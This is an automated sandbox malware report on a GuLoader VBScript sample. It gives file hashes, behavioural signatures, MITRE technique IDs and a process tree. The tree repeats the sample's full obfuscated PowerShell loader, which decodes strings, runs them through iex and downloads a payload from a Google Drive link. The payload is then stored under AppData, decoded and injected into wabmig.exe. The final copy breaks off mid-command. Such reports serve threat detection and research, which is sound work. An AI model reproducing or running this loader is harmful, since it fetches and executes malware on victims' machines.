guloader | 0283ac18b6cd19f4ddacef6c878069f856820fd7c7ce5a5b90cbfce31ca5657f

General

Target

6754a5938953902145151e2bacfcfd6e55d6f943464fecbc10ce13fd7cc130c5.vbe
Size

33KB
MD5

3d931d67341a7178eed6018098e82026
SHA1

28738415421b3631245b7f8939ff625bb2d56d7a
SHA256

6754a5938953902145151e2bacfcfd6e55d6f943464fecbc10ce13fd7cc130c5
SHA512

7ba628cd12f11eede084bdc30a29c1d1092b14ba468bcbab319b327e637ffb49d825298402ec4389f8e9032a4741a8ca015132d47a31336e8cb4e56750f9f979
SSDEEP

384:Z9vOg3Z9KsZOs0gN/C2NE3+DEytdZbFo/SwiKFTblveb0fyio/:Zp3Z/N/C2K3v2LfwiKFsk4

Score

10^/10

guloader discovery downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2704	powershell.exe
7	2704	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2856	wabmig.exe
2856	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1516	powershell.exe
2856	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1516 set thread context of 2856	1516	powershell.exe	37

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1516	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2704	powershell.exe
1516	powershell.exe
1516	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1516	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	1516	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2856	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2692 wrote to memory of 2704	2692	WScript.exe	30
PID 2692 wrote to memory of 2704	2692	WScript.exe	30
PID 2692 wrote to memory of 2704	2692	WScript.exe	30
PID 2704 wrote to memory of 2896	2704	powershell.exe	32
PID 2704 wrote to memory of 2896	2704	powershell.exe	32
PID 2704 wrote to memory of 2896	2704	powershell.exe	32
PID 2704 wrote to memory of 2912	2704	powershell.exe	34
PID 2704 wrote to memory of 2912	2704	powershell.exe	34
PID 2704 wrote to memory of 2912	2704	powershell.exe	34
PID 2912 wrote to memory of 1516	2912	cmd.exe	35
PID 2912 wrote to memory of 1516	2912	cmd.exe	35
PID 2912 wrote to memory of 1516	2912	cmd.exe	35
PID 2912 wrote to memory of 1516	2912	cmd.exe	35
PID 1516 wrote to memory of 1520	1516	powershell.exe	36
PID 1516 wrote to memory of 1520	1516	powershell.exe	36
PID 1516 wrote to memory of 1520	1516	powershell.exe	36
PID 1516 wrote to memory of 1520	1516	powershell.exe	36
PID 1516 wrote to memory of 2856	1516	powershell.exe	37
PID 1516 wrote to memory of 2856	1516	powershell.exe	37
PID 1516 wrote to memory of 2856	1516	powershell.exe	37
PID 1516 wrote to memory of 2856	1516	powershell.exe	37
PID 1516 wrote to memory of 2856	1516	powershell.exe	37
PID 1516 wrote to memory of 2856	1516	powershell.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6754a5938953902145151e2bacfcfd6e55d6f943464fecbc10ce13fd7cc130c5.vbe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#lammergeier Illustrationsideer sesquialteran Bestyrelsesposter #>;$hemen='Pacificer';<#Mesymnion urgeringens Unmitigative Ivorybill Fremfringshastighed Afreet Araneae #>;$Fluorindine92=$host.PrivateData;If ($Fluorindine92) {$Tvivlsommererritamentet++;}function Sereh($Stopventilernes){$Tvivlsommerebenholtsfljterne=$Stopventilernes.Length-$Tvivlsommererritamentet;for( $Tvivlsommere=5;$Tvivlsommere -lt $Tvivlsommerebenholtsfljterne;$Tvivlsommere+=6){$Nationaliserings+=$Stopventilernes[$Tvivlsommere];}$Nationaliserings;}function unhoard($Bronchium){ . ($Himmelfartsdag) ($Bronchium);}$Operationalization=Sereh 'HydroM W tcoAf.ndz Me.liBlodbl ValflultraaModer/Vint 5 Tilp.Coppi0 Fins Regn(ZooloWBabuaivansinAnfordAldehoBalt.wPdagosTotur NonaNEnkelTIbrnd Voetg1 Redn0 Unha.U sub0 .iaa;raasi CommoW premi AmtsnIngeb6F lse4Oatme;Samle Fa gsxUved.6Snoda4 Biet;Lavri Bilamr TwitvThrou:Smreo1 Hest2 tem1Overc.Gleet0Bitni)Bogs twinsG Da,ieOptagcDeplokAroynoNonde/I ida2 Mili0Boile1 Sho,0Myoto0,verw1 Octa0Skriv1Rheum SlacFKnstkiHjlperByggee HexifSatsao BegyxLeg,t/Compa1 .ena2Damph1 Admo.I dsk0Enzym ';$Concaptive=Sereh 'RyggeuCoproSEfterestipuRKe ta- baanA Hy,oGHemm EPanteNpampeTPe ep ';$Otelcosis=Sereh 'Over hFllestC upatPattepBhagas ykew:Ceci / Vidn/UopstdUdsvirB idgiwaz.rv Al re alou.S.eelgPinaco Wh,roSolubg Cirkl ResieQuest.SubjacCharkoSinusm Slle/SydliuD lbacVinte?EnsreeCo.ntx SkpppHjkuloSkejsrMonittCo.dy= JudidPomewo Rs iwKropenForunlReimpoOutsta ,rbed ,orb&kvik,iD ktad ypog=Gyld 1AfgraYLuftibNeedeJ UnerKFl nt5MaanegHo esHCo orsStudizPaginNBukniXRec nP SkilMPanam8Olieb2AutopvBacteEHove rs.aphVJelsea D reZ remeyDilet- T whWA sti6 CeilRComatV,enostTa,lwFHag,iTHes.erBlackM Ophi ';$Elementhusene=Sereh 'Amoti>Feuda ';$Himmelfartsdag=Sereh 'nonreiPar.lEPolyox.ncho ';$Nonsenet='varelagre';$Nullernes = Sereh 'Arbe.eSchiscBjrgshGu rioB ugt Phren%Barn aNondapPostapRhei dV,lidaTa tat,nvigaSpart% M.xo\MalabF,eaneiUnflanFibriaNyfi.n Su.ecMagniiUndereOndskrSandveG.mmad onvi. Gig a Ano dConspvTesta Lavtg&Afska& P ag Ud.age A gocLyk ehResuro.egro ivertr spr ';unhoard (Sereh 'Glute$BandegJi.gllAfbrno KonfbP.npaaseptilTj ne:UnderMPliero Henrrro dybtilstiFloorlmedi,lLucitoAkkomumili s onta= Incr(IncorcSl.tnmFightddomsm Rooml/vuersc.fsmi Acc p$fusioN AfpluRodeolKrs.llProcyeArealrho.ednBra.keCo pusAkele)inter ');unhoard (Sereh 'Specu$Synkrgreprol CenooBen obSelinaTupi l hete:Solb P MonaoTrskenVandid Pande TirerInforaIndfatHemagi PresoIndrmn Prec=frems$InterOtriantPropre PicklCa,lic,kkorode.pesK.utzieclecsconco.UtumrsKvivapKund lBeklii,lykktSkriv(Spond$arbejE ,trilI laye S,elmBonnieHemm n SpeltCristhC einu UnglsOverbeMonomn A lee traa)Parad ');unhoard (Sereh 'Fores[BalanNSkilleHet rtFalsk.PeriaS cus efe rirA,strvBe.agiVoidscErhveeImperPOcty oLe idiOmrr.nDrabbtMonocMReskoashaggn ftraPourag.tasseslvbrrSogdi]Eryth:Cr,pt:S nknSP aeoe Fl bcCosciuRenterArchoiSel ut CoeryCreosP Es,rr HemooTabultkor,noMorphcbull oto.relLilan Fedte=Ko,me Flles[MaledN ologeaetertVolum.Unc rSO opheAbomic Eksau IngerVaskei Cyr t SkinyOverdPFurlarBroanoB neftOrdbooS rupcOckfloAdvoklTurneTEvoley MennpNybygeDist ] heva:artol:LnsatTvati,lenkensBakke1 Belk2en ri ');$Otelcosis=$Ponderation[0];$Anvendelsesorienteret112= (Sereh ' rabe$ .rang Str.LMa egOPratiBGasteA MakklBonas:Haan,sSygeeT quidiOr.erLSmalrlBenv.E Overd U oreCaim =Rickln ,enzENdpl WGrafb-FortroLivsnBSky sJBesvrEsm.okcSwoonTBando u meaSTrst,y Matus olytGa maEErg mMFlsk,.Damm NAngule lonetExp.d.Fa ciwPrevee UndibBetnkcD mkaLSkattiUnrepEsubfunNonstT');$Anvendelsesorienteret112+=$Morbillous[1];unhoard ($Anvendelsesorienteret112);unhoard (Sereh ' .pid$AwakaSVddeltStep i T,rmlForbalSnowsePrededscr.eeAfslr.GroggHUptrueBarbraFat yd Hynees,fisr Porrs kspo[Cirku$TelesCKloveoDrontnHam dcUnrowatils pBlod.t Gau i trakvSeni eVagne]Alkal=Tota $ PapiOLen mpagaleeIrritrhemaraK ntatCar siDo,beoTnkemnBidraaHematl KogeiHydrozNishiaBedsttAmphiiSamp oSectinTubat ');$Dekoreredes=Sereh 'Pl gu$ ChapSReasstOver,iArchal oroglFleureunreadOpfriepisc .fotomDTiendoUnc lw enetn.orstlbutyloTi,baaOverld NedeFMai gi G.nil GrdieRedni(U.age$ DepoOAdlydtDislie levilMaanecYor.ro,ngios M.thiHephts Fo s,Gr nd$FanouRS,illi GennmZygmuiH,mene MiljrNekro1 Manu3Konte1Draen) ord ';$Rimier131=$Morbillous[0];unhoard (Sereh 'gsten$PersoG elicl Bl mODerivbFortyAFarmel fy i:ObstrSVildttAbol UFalsud SnvrIYard eBrevoPVidunlBeh,nAMegald delsBlokdEDolibRW altnNon ee Gours Anke= Noct(Enes tAdenoeJordesTrykstCu,pa- ointpPhycia utistCosmohForp Suffr$Ethnor CrepIRenowM Mi iiStrateP,lemr Nu m1Older3Phant1Visit)Hexam ');while (!$Studiepladsernes) {unhoard (Sereh 'Total$diskrg VrdilWh.ngoOverfbOrnita progl.verd:Sai aAOrgansI,eith Eidepfu,zelDigenaDelinnAfha tKabinsSt,ic=Tarnk$PalomtKup erAnp rusp,lleBlenn ') ;unhoard $Dekoreredes;unhoard (Sereh 'sparrSF nantAffolaInsolrGe.gatBrans- Si kSNonu.l BetseCorneeBeaujpvilia Senso4Rense ');unhoard (Sereh 'Stn p$Afr ggUbarblS ernoFaresbParafaHder,lInfek:AmmonS.fstetBaviaunomindWa deiNonfleHureapKurvelWei eaRetfrdE ingsIoni e Ko.trBioscnWeitseNab.ls.rkra=Nedfl(HylerT SleteCad tsBestitSprea-Ko,lePTalkiaFredstP rtuhfolke rus y$Con.iR,reoriPorsemSldefiHul,oetrogorTraum1 Skib3Trans1 I dr) Ly.t ') ;unhoard (Sereh 'Polyc$ Lykng Bodil,ctogo pecbSlowuadambrlGeogr:Yipv MSuccebP veblBant eSuppur Bestn BlideToste=Magni$Fors gVirkslBlecioLe,tybHyleraSk,ttlUdmrk:Sank BNon iaJonissL gosiKvs.enAnnuia PigesA ouriEnzyma P,onl Re u+kart + Surf%Folk,$AnikiPSpandoundisnSa ted SubceEpi.ori.veraIndpatDyspeiS ackoLe.finNonpo.Immanc I.mbo naruBenzynSwindtStemn ') ;$Otelcosis=$Ponderation[$Mblerne];}$Urskovsmrket=335640;$Tvivlsommerendri=27847;unhoard (Sereh 'Calci$IndaagD ssulThoraoKlaribTrs ia Metelfo db:OleacNtvinee Eurot bransAfsyrt Perpi,uppukDisrek bogreToyintCyklu Epos.=By,on Ud,kGafs nesyrphtKon.e-ChampCKommuoSkot nUnph t Pam eSeksun Lap.tOra g C li$Car aRFor wiFdselmHerniizarnieUnderrSyncr1Forsk3 Siza1Troi ');unhoard (Sereh 'Dec,m$Bobesg Eftel sagloKonsub,heotaSamf lEctom:bamseP B ckaCitolaMis ek,nvesrS rubeDishwn Wa ddBrak e Giri Logbo=Pre r Betrk[UnseaSkamplyolioss VefrtDiskeeHomeomApr.t.AscenC GangoFor lnUnporvRobeneDeplor So,ttUk,nt]Alkyl:A tho:FarveFSpinur Deplolunefm lysB T rba Snk sUnderepindl6Telef4Jims S anmatSnerprstatsi Domen,asarg typ,(Emb r$Skr uNn nebeSmrbotPh tosN.npetSuperiHeadfkTenorkGrunde.tatit Erhv) Raff ');unhoard (Sereh 'Yvonn$bardeghermelNonpao PegsbModsta B,skloppeb:GeigePPoloioGui ar .nobsGal o Ca t=Komme Impeo[DeadeSFigury nversOm,attLandfe kolkm K.nt.ArbejTMalapeTrianxBoreptOkeru.Pous EOverlnhlde cVelu.oForspd Ulc iNidd nM,strgHarpa]V,lut: f ik:m,lliA R.suSPhyciCknusmIDri tINiche.SladdG etmleGangwtInappS irkt H rrr R ntiForlanByporgRets (Ch on$AnthePSmagnaTrigla.revlkunquerkongeeshad nSoe,ed Col eSyste) Srkl ');unhoard (Sereh 'Fjern$ N,trg bratl Om toOverfbUndf a PhytlMelod:UdrmmKOver,iMu ams apitrTidssaFemto1Urano4 inti=No me$DeminP Trskognaverknbuks U de.MelansLo.ryuS ckebIdomesSt mmtNedsnr BramiAttringen.tgauthe(Gra s$,apabU SlavrS,ampsOptr.k K.ntoSkeldv Erods K ebm KlunrpaaklkStnineFranat Vrdi, vic$ChronTReklavMisdoiAntsivSubtrlSkylds ParaodelagmC lotmUnderekry drPersoeCr menVo.dsdRe,nnr forsiSp.og) Sprr ');unhoard $Kisra14;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Financiered.adv && echo t"
    3⤵
    PID:2896
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#lammergeier Illustrationsideer sesquialteran Bestyrelsesposter #>;$hemen='Pacificer';<#Mesymnion urgeringens Unmitigative Ivorybill Fremfringshastighed Afreet Araneae #>;$Fluorindine92=$host.PrivateData;If ($Fluorindine92) {$Tvivlsommererritamentet++;}function Sereh($Stopventilernes){$Tvivlsommerebenholtsfljterne=$Stopventilernes.Length-$Tvivlsommererritamentet;for( $Tvivlsommere=5;$Tvivlsommere -lt $Tvivlsommerebenholtsfljterne;$Tvivlsommere+=6){$Nationaliserings+=$Stopventilernes[$Tvivlsommere];}$Nationaliserings;}function unhoard($Bronchium){ . ($Himmelfartsdag) ($Bronchium);}$Operationalization=Sereh 'HydroM W tcoAf.ndz Me.liBlodbl ValflultraaModer/Vint 5 Tilp.Coppi0 Fins Regn(ZooloWBabuaivansinAnfordAldehoBalt.wPdagosTotur NonaNEnkelTIbrnd Voetg1 Redn0 Unha.U sub0 .iaa;raasi CommoW premi AmtsnIngeb6F lse4Oatme;Samle Fa gsxUved.6Snoda4 Biet;Lavri Bilamr TwitvThrou:Smreo1 Hest2 tem1Overc.Gleet0Bitni)Bogs twinsG Da,ieOptagcDeplokAroynoNonde/I ida2 Mili0Boile1 Sho,0Myoto0,verw1 Octa0Skriv1Rheum SlacFKnstkiHjlperByggee HexifSatsao BegyxLeg,t/Compa1 .ena2Damph1 Admo.I dsk0Enzym ';$Concaptive=Sereh 'RyggeuCoproSEfterestipuRKe ta- baanA Hy,oGHemm EPanteNpampeTPe ep ';$Otelcosis=Sereh 'Over hFllestC upatPattepBhagas ykew:Ceci / Vidn/UopstdUdsvirB idgiwaz.rv Al re alou.S.eelgPinaco Wh,roSolubg Cirkl ResieQuest.SubjacCharkoSinusm Slle/SydliuD lbacVinte?EnsreeCo.ntx SkpppHjkuloSkejsrMonittCo.dy= JudidPomewo Rs iwKropenForunlReimpoOutsta ,rbed ,orb&kvik,iD ktad ypog=Gyld 1AfgraYLuftibNeedeJ UnerKFl nt5MaanegHo esHCo orsStudizPaginNBukniXRec nP SkilMPanam8Olieb2AutopvBacteEHove rs.aphVJelsea D reZ remeyDilet- T whWA sti6 CeilRComatV,enostTa,lwFHag,iTHes.erBlackM Ophi ';$Elementhusene=Sereh 'Amoti>Feuda ';$Himmelfartsdag=Sereh 'nonreiPar.lEPolyox.ncho ';$Nonsenet='varelagre';$Nullernes = Sereh 'Arbe.eSchiscBjrgshGu rioB ugt Phren%Barn aNondapPostapRhei dV,lidaTa tat,nvigaSpart% M.xo\MalabF,eaneiUnflanFibriaNyfi.n Su.ecMagniiUndereOndskrSandveG.mmad onvi. Gig a Ano dConspvTesta Lavtg&Afska& P ag Ud.age A gocLyk ehResuro.egro ivertr spr ';unhoard (Sereh 'Glute$BandegJi.gllAfbrno KonfbP.npaaseptilTj ne:UnderMPliero Henrrro dybtilstiFloorlmedi,lLucitoAkkomumili s onta= Incr(IncorcSl.tnmFightddomsm Rooml/vuersc.fsmi Acc p$fusioN AfpluRodeolKrs.llProcyeArealrho.ednBra.keCo pusAkele)inter ');unhoard (Sereh 'Specu$Synkrgreprol CenooBen obSelinaTupi l hete:Solb P MonaoTrskenVandid Pande TirerInforaIndfatHemagi PresoIndrmn Prec=frems$InterOtriantPropre PicklCa,lic,kkorode.pesK.utzieclecsconco.UtumrsKvivapKund lBeklii,lykktSkriv(Spond$arbejE ,trilI laye S,elmBonnieHemm n SpeltCristhC einu UnglsOverbeMonomn A lee traa)Parad ');unhoard (Sereh 'Fores[BalanNSkilleHet rtFalsk.PeriaS cus efe rirA,strvBe.agiVoidscErhveeImperPOcty oLe idiOmrr.nDrabbtMonocMReskoashaggn ftraPourag.tasseslvbrrSogdi]Eryth:Cr,pt:S nknSP aeoe Fl bcCosciuRenterArchoiSel ut CoeryCreosP Es,rr HemooTabultkor,noMorphcbull oto.relLilan Fedte=Ko,me Flles[MaledN ologeaetertVolum.Unc rSO opheAbomic Eksau IngerVaskei Cyr t SkinyOverdPFurlarBroanoB neftOrdbooS rupcOckfloAdvoklTurneTEvoley MennpNybygeDist ] heva:artol:LnsatTvati,lenkensBakke1 Belk2en ri ');$Otelcosis=$Ponderation[0];$Anvendelsesorienteret112= (Sereh ' rabe$ .rang Str.LMa egOPratiBGasteA MakklBonas:Haan,sSygeeT quidiOr.erLSmalrlBenv.E Overd U oreCaim =Rickln ,enzENdpl WGrafb-FortroLivsnBSky sJBesvrEsm.okcSwoonTBando u meaSTrst,y Matus olytGa maEErg mMFlsk,.Damm NAngule lonetExp.d.Fa ciwPrevee UndibBetnkcD mkaLSkattiUnrepEsubfunNonstT');$Anvendelsesorienteret112+=$Morbillous[1];unhoard ($Anvendelsesorienteret112);unhoard (Sereh ' .pid$AwakaSVddeltStep i T,rmlForbalSnowsePrededscr.eeAfslr.GroggHUptrueBarbraFat yd Hynees,fisr Porrs kspo[Cirku$TelesCKloveoDrontnHam dcUnrowatils pBlod.t Gau i trakvSeni eVagne]Alkal=Tota $ PapiOLen mpagaleeIrritrhemaraK ntatCar siDo,beoTnkemnBidraaHematl KogeiHydrozNishiaBedsttAmphiiSamp oSectinTubat ');$Dekoreredes=Sereh 'Pl gu$ ChapSReasstOver,iArchal oroglFleureunreadOpfriepisc .fotomDTiendoUnc lw enetn.orstlbutyloTi,baaOverld NedeFMai gi G.nil GrdieRedni(U.age$ DepoOAdlydtDislie levilMaanecYor.ro,ngios M.thiHephts Fo s,Gr nd$FanouRS,illi GennmZygmuiH,mene MiljrNekro1 Manu3Konte1Draen) ord ';$Rimier131=$Morbillous[0];unhoard (Sereh 'gsten$PersoG elicl Bl mODerivbFortyAFarmel fy i:ObstrSVildttAbol UFalsud SnvrIYard eBrevoPVidunlBeh,nAMegald delsBlokdEDolibRW altnNon ee Gours Anke= Noct(Enes tAdenoeJordesTrykstCu,pa- ointpPhycia utistCosmohForp Suffr$Ethnor CrepIRenowM Mi iiStrateP,lemr Nu m1Older3Phant1Visit)Hexam ');while (!$Studiepladsernes) {unhoard (Sereh 'Total$diskrg VrdilWh.ngoOverfbOrnita progl.verd:Sai aAOrgansI,eith Eidepfu,zelDigenaDelinnAfha tKabinsSt,ic=Tarnk$PalomtKup erAnp rusp,lleBlenn ') ;unhoard $Dekoreredes;unhoard (Sereh 'sparrSF nantAffolaInsolrGe.gatBrans- Si kSNonu.l BetseCorneeBeaujpvilia Senso4Rense ');unhoard (Sereh 'Stn p$Afr ggUbarblS ernoFaresbParafaHder,lInfek:AmmonS.fstetBaviaunomindWa deiNonfleHureapKurvelWei eaRetfrdE ingsIoni e Ko.trBioscnWeitseNab.ls.rkra=Nedfl(HylerT SleteCad tsBestitSprea-Ko,lePTalkiaFredstP rtuhfolke rus y$Con.iR,reoriPorsemSldefiHul,oetrogorTraum1 Skib3Trans1 I dr) Ly.t ') ;unhoard (Sereh 'Polyc$ Lykng Bodil,ctogo pecbSlowuadambrlGeogr:Yipv MSuccebP veblBant eSuppur Bestn BlideToste=Magni$Fors gVirkslBlecioLe,tybHyleraSk,ttlUdmrk:Sank BNon iaJonissL gosiKvs.enAnnuia PigesA ouriEnzyma P,onl Re u+kart + Surf%Folk,$AnikiPSpandoundisnSa ted SubceEpi.ori.veraIndpatDyspeiS ackoLe.finNonpo.Immanc I.mbo naruBenzynSwindtStemn ') ;$Otelcosis=$Ponderation[$Mblerne];}$Urskovsmrket=335640;$Tvivlsommerendri=27847;unhoard (Sereh 'Calci$IndaagD ssulThoraoKlaribTrs ia Metelfo db:OleacNtvinee Eurot bransAfsyrt Perpi,uppukDisrek bogreToyintCyklu Epos.=By,on Ud,kGafs nesyrphtKon.e-ChampCKommuoSkot nUnph t Pam eSeksun Lap.tOra g C li$Car aRFor wiFdselmHerniizarnieUnderrSyncr1Forsk3 Siza1Troi ');unhoard (Sereh 'Dec,m$Bobesg Eftel sagloKonsub,heotaSamf lEctom:bamseP B ckaCitolaMis ek,nvesrS rubeDishwn Wa ddBrak e Giri Logbo=Pre r Betrk[UnseaSkamplyolioss VefrtDiskeeHomeomApr.t.AscenC GangoFor lnUnporvRobeneDeplor So,ttUk,nt]Alkyl:A tho:FarveFSpinur Deplolunefm lysB T rba Snk sUnderepindl6Telef4Jims S anmatSnerprstatsi Domen,asarg typ,(Emb r$Skr uNn nebeSmrbotPh tosN.npetSuperiHeadfkTenorkGrunde.tatit Erhv) Raff ');unhoard (Sereh 'Yvonn$bardeghermelNonpao PegsbModsta B,skloppeb:GeigePPoloioGui ar .nobsGal o Ca t=Komme Impeo[DeadeSFigury nversOm,attLandfe kolkm K.nt.ArbejTMalapeTrianxBoreptOkeru.Pous EOverlnhlde cVelu.oForspd Ulc iNidd nM,strgHarpa]V,lut: f ik:m,lliA R.suSPhyciCknusmIDri tINiche.SladdG etmleGangwtInappS irkt H rrr R ntiForlanByporgRets (Ch on$AnthePSmagnaTrigla.revlkunquerkongeeshad nSoe,ed Col eSyste) Srkl ');unhoard (Sereh 'Fjern$ N,trg bratl Om toOverfbUndf a PhytlMelod:UdrmmKOver,iMu ams apitrTidssaFemto1Urano4 inti=No me$DeminP Trskognaverknbuks U de.MelansLo.ryuS ckebIdomesSt mmtNedsnr BramiAttringen.tgauthe(Gra s$,apabU SlavrS,ampsOptr.k K.ntoSkeldv Erods K ebm KlunrpaaklkStnineFranat Vrdi, vic$ChronTReklavMisdoiAntsivSubtrlSkylds ParaodelagmC lotmUnderekry drPersoeCr menVo.dsdRe,nnr forsiSp.og) Sprr ');unhoard $Kisra14;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2912
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#lammergeier Illustrationsideer sesquialteran Bestyrelsesposter #>;$hemen='Pacificer';<#Mesymnion urgeringens Unmitigative Ivorybill Fremfringshastighed Afreet Araneae #>;$Fluorindine92=$host.PrivateData;If ($Fluorindine92) {$Tvivlsommererritamentet++;}function Sereh($Stopventilernes){$Tvivlsommerebenholtsfljterne=$Stopventilernes.Length-$Tvivlsommererritamentet;for( $Tvivlsommere=5;$Tvivlsommere -lt $Tvivlsommerebenholtsfljterne;$Tvivlsommere+=6){$Nationaliserings+=$Stopventilernes[$Tvivlsommere];}$Nationaliserings;}function unhoard($Bronchium){ . ($Himmelfartsdag) ($Bronchium);}$Operationalization=Sereh 'HydroM W tcoAf.ndz Me.liBlodbl ValflultraaModer/Vint 5 Tilp.Coppi0 Fins Regn(ZooloWBabuaivansinAnfordAldehoBalt.wPdagosTotur NonaNEnkelTIbrnd Voetg1 Redn0 Unha.U sub0 .iaa;raasi CommoW premi AmtsnIngeb6F lse4Oatme;Samle Fa gsxUved.6Snoda4 Biet;Lavri Bilamr TwitvThrou:Smreo1 Hest2 tem1Overc.Gleet0Bitni)Bogs twinsG Da,ieOptagcDeplokAroynoNonde/I ida2 Mili0Boile1 Sho,0Myoto0,verw1 Octa0Skriv1Rheum SlacFKnstkiHjlperByggee HexifSatsao BegyxLeg,t/Compa1 .ena2Damph1 Admo.I dsk0Enzym ';$Concaptive=Sereh 'RyggeuCoproSEfterestipuRKe ta- baanA Hy,oGHemm EPanteNpampeTPe ep ';$Otelcosis=Sereh 'Over hFllestC upatPattepBhagas ykew:Ceci / Vidn/UopstdUdsvirB idgiwaz.rv Al re alou.S.eelgPinaco Wh,roSolubg Cirkl ResieQuest.SubjacCharkoSinusm Slle/SydliuD lbacVinte?EnsreeCo.ntx SkpppHjkuloSkejsrMonittCo.dy= JudidPomewo Rs iwKropenForunlReimpoOutsta ,rbed ,orb&kvik,iD ktad ypog=Gyld 1AfgraYLuftibNeedeJ UnerKFl nt5MaanegHo esHCo orsStudizPaginNBukniXRec nP SkilMPanam8Olieb2AutopvBacteEHove rs.aphVJelsea D reZ remeyDilet- T whWA sti6 CeilRComatV,enostTa,lwFHag,iTHes.erBlackM Ophi ';$Elementhusene=Sereh 'Amoti>Feuda ';$Himmelfartsdag=Sereh 'nonreiPar.lEPolyox.ncho ';$Nonsenet='varelagre';$Nullernes = Sereh 'Arbe.eSchiscBjrgshGu rioB ugt Phren%Barn aNondapPostapRhei dV,lidaTa tat,nvigaSpart% M.xo\MalabF,eaneiUnflanFibriaNyfi.n Su.ecMagniiUndereOndskrSandveG.mmad onvi. Gig a Ano dConspvTesta Lavtg&Afska& P ag Ud.age A gocLyk ehResuro.egro ivertr spr ';unhoard (Sereh 'Glute$BandegJi.gllAfbrno KonfbP.npaaseptilTj ne:UnderMPliero Henrrro dybtilstiFloorlmedi,lLucitoAkkomumili s onta= Incr(IncorcSl.tnmFightddomsm Rooml/vuersc.fsmi Acc p$fusioN AfpluRodeolKrs.llProcyeArealrho.ednBra.keCo pusAkele)inter ');unhoard (Sereh 'Specu$Synkrgreprol CenooBen obSelinaTupi l hete:Solb P MonaoTrskenVandid Pande TirerInforaIndfatHemagi PresoIndrmn Prec=frems$InterOtriantPropre PicklCa,lic,kkorode.pesK.utzieclecsconco.UtumrsKvivapKund lBeklii,lykktSkriv(Spond$arbejE ,trilI laye S,elmBonnieHemm n SpeltCristhC einu UnglsOverbeMonomn A lee traa)Parad ');unhoard (Sereh 'Fores[BalanNSkilleHet rtFalsk.PeriaS cus efe rirA,strvBe.agiVoidscErhveeImperPOcty oLe idiOmrr.nDrabbtMonocMReskoashaggn ftraPourag.tasseslvbrrSogdi]Eryth:Cr,pt:S nknSP aeoe Fl bcCosciuRenterArchoiSel ut CoeryCreosP Es,rr HemooTabultkor,noMorphcbull oto.relLilan Fedte=Ko,me Flles[MaledN ologeaetertVolum.Unc rSO opheAbomic Eksau IngerVaskei Cyr t SkinyOverdPFurlarBroanoB neftOrdbooS rupcOckfloAdvoklTurneTEvoley MennpNybygeDist ] heva:artol:LnsatTvati,lenkensBakke1 Belk2en ri ');$Otelcosis=$Ponderation[0];$Anvendelsesorienteret112= (Sereh ' rabe$ .rang Str.LMa egOPratiBGasteA MakklBonas:Haan,sSygeeT quidiOr.erLSmalrlBenv.E Overd U oreCaim =Rickln ,enzENdpl WGrafb-FortroLivsnBSky sJBesvrEsm.okcSwoonTBando u meaSTrst,y Matus olytGa maEErg mMFlsk,.Damm NAngule lonetExp.d.Fa ciwPrevee UndibBetnkcD mkaLSkattiUnrepEsubfunNonstT');$Anvendelsesorienteret112+=$Morbillous[1];unhoard ($Anvendelsesorienteret112);unhoard (Sereh ' .pid$AwakaSVddeltStep i T,rmlForbalSnowsePrededscr.eeAfslr.GroggHUptrueBarbraFat yd Hynees,fisr Porrs kspo[Cirku$TelesCKloveoDrontnHam dcUnrowatils pBlod.t Gau i trakvSeni eVagne]Alkal=Tota $ PapiOLen mpagaleeIrritrhemaraK ntatCar siDo,beoTnkemnBidraaHematl KogeiHydrozNishiaBedsttAmphiiSamp oSectinTubat ');$Dekoreredes=Sereh 'Pl gu$ ChapSReasstOver,iArchal oroglFleureunreadOpfriepisc .fotomDTiendoUnc lw enetn.orstlbutyloTi,baaOverld NedeFMai gi G.nil GrdieRedni(U.age$ DepoOAdlydtDislie levilMaanecYor.ro,ngios M.thiHephts Fo s,Gr nd$FanouRS,illi GennmZygmuiH,mene MiljrNekro1 Manu3Konte1Draen) ord ';$Rimier131=$Morbillous[0];unhoard (Sereh 'gsten$PersoG elicl Bl mODerivbFortyAFarmel fy i:ObstrSVildttAbol UFalsud SnvrIYard 